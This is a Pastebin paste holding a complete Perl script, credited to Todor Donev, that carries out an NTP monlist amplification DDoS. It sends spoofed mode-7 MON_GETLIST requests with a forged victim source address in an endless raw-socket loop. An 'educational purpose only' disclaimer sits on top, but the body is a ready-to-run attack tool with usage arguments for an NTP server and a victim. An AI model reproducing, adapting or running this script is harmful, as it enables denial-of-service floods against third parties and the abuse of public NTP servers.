Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- #
- # ntp MON_GETLIST query amplification ddos
- #
- # Copyright 2015 (c) Todor Donev
- # todor.donev@gmail.com
- # http://www.ethical-hacker.org/
- # https://www.facebook.com/ethicalhackerorg
- #
- # A Network Time Protocol (NTP) Amplification
- # attack is an emerging form of Distributed
- # Denial of Service (DDoS) that relies on the
- # use of publically accessible NTP servers to
- # overwhelm a victim system with UDP traffic.
- # The NTP service supports a monitoring service
- # that allows administrators to query the server
- # for traffic counts of connected clients. This
- # information is provided via the “monlist”
- # command. The basic attack technique consists
- # of an attacker sending a "get monlist" request
- # to a vulnerable NTP server, with the source
- # address spoofed to be the victim’s address.
- #
- #
- # Disclaimer:
- # This or previous program is for Educational
- # purpose ONLY. Do not use it without permission.
- # The usual disclaimer applies, especially the
- # fact that Todor Donev is not liable for any
- # damages caused by direct or indirect use of the
- # information or functionality provided by these
- # programs. The author or any Internet provider
- # bears NO responsibility for content or misuse
- # of these programs or any derivatives thereof.
- # By using these programs you accept the fact
- # that any damage (dataloss, system crash,
- # system compromise, etc.) caused by the use
- # of these programs is not Todor Donev's
- # responsibility.
- #
- # Use at your own risk and educational
- # purpose ONLY!
- #
- # See also, UDP-based Amplification Attacks:
- # https://www.us-cert.gov/ncas/alerts/TA14-017A
- #
- #
- use Socket;
- if ( $< != 0 ) {
- print "Sorry, must be run as root!\n";
- print "This script use RAW Socket.\n";
- exit;
- }
- my $ntpd = (gethostbyname($ARGV[0]))[4]; # IP Address Destination (32 bits)
- my $victim = (gethostbyname($ARGV[1]))[4]; # IP Address Source (32 bits)
- print "[ ntpd MON_GETLIST query amplification ]\n";
- if (!defined $ntpd || !defined $victim) {
- print "[ Usg: $0 <ntp server> <victim>\n";
- print "[ <todor.donev\@gmail.com> Todor Donev ]\n";
- exit;
- }
- print "[ Sending NTP packets: $ARGV[0] -> $ARGV[1]\n";
- socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
- setsockopt(RAW, 0, 1, 1) or die $!;
- main();
- # Main program
- sub main {
- my $packet;
- $packet = iphdr();
- $packet .= udphdr();
- $packet .= ntphdr();
- # b000000m...
- send_packet($packet);
- }
- # IP header (Layer 3)
- sub iphdr {
- my $ip_ver = 4; # IP Version 4 (4 bits)
- my $iphdr_len = 5; # IP Header Length (4 bits)
- my $ip_tos = 0; # Differentiated Services (8 bits)
- my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
- my $ip_frag_id = 0; # Identification Field (16 bits)
- my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)
- my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)
- my $ip_ttl = 255; # IP TTL (8 bits)
- my $ip_proto = 17; # IP Protocol (8 bits)
- my $ip_checksum = 0; # IP Checksum (16 bits)
- # IP Packet
- my $iphdr = pack(
- 'H2 H2 n n B16 h2 c n a4 a4',
- $ip_ver . $iphdr_len, $ip_tos,
- $ip_total_len, $ip_frag_id,
- $ip_frag_flag . $ip_frag_offset,
- $ip_ttl, $ip_proto, $ip_checksum,
- $victim, $ntpd
- );
- return $iphdr;
- }
- # UDP Header (Layer 4)
- sub udphdr {
- my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535)
- my $udp_dst_port = 123; # UDP Dest Port (16 btis) (0-65535)
- my $udp_len = 8 + length(ntphdr()); # UDP Length (16 bits) (0-65535)
- my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header)
- # UDP Packet
- my $udphdr = pack(
- 'n n n n',
- $udp_src_port,
- $udp_dst_port,
- $udp_len,
- $udp_checksum
- );
- return $udphdr;
- }
- # NTP Header (Layer 7)
- sub ntphdr {
- my $rm_vn_mode = 0x27;
- # Response bit to 0, More bit to 0, Version field to 2, Mode field to 7
- #
- # A mode 7 packet is used exchanging data between an NTP server
- # and a client for purposes other than time synchronization, e.g.
- # monitoring, statistics gathering and configuration. A mode 7
- # packet has the following format:
- #
- # 0 1 2 3
- # 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
- # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
- # |R|M| VN | Mode|A| Sequence | Implementation| Req Code |
- # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
- # | Err | Number of data items | MBZ | Size of data item |
- # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
- # | |
- # | Data (Minimum 0 octets, maximum 500 octets) |
- # | |
- # | [...] |
- # | |
- # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
- # | Encryption Keyid (when A bit set) |
- # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
- # | |
- # | Message Authentication Code (when A bit set) |
- # | |
- # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
- #
- # where the fields are (note that the client sends requests, the server
- # responses):
- # Response Bit: This packet is a response (if clear, packet is a request).
- # More Bit: Set for all packets but the last in a response which
- # requires more than one packet.
- # Version Number: 2 for current version
- # Mode: Always 7
- my $auth = 0x00; # If set, this packet is authenticated.
- my $implementation = 0x03; # Iimplementation: 0x00 (UNIV), 0x02 (XNTPD_OLD), 0x03 (XNTPD)
- # The number of the implementation this request code
- # is defined by. An implementation number of zero is used
- # for requst codes/data formats which all implementations
- # agree on. Implementation number 255 is reserved (for
- # extensions, in case we run out).
- my $request = 0x2a; # Request code is an implementation-specific code which specifies the
- # operation to be (which has been) performed and/or the
- # format and semantics of the data included in the packet
- # 0x02 (PEER_INFO), 0x03 (PEER_STATS), 0x04 (SYS_INFO),
- # 0x04 (SYS_STATS), 0x2a (MON_GETLIST)
- # NTP packet
- my $ntphdr = pack(
- 'W2 C2 C2 C2',
- $rm_vn_mode,
- $auth,
- $implementation,
- $request
- );
- return $ntphdr;
- }
- sub send_packet {
- while(1){
- select(undef, undef, undef, 0.30); # Sleep 300 milliseconds
- send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $ntpd)) or die $!;
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement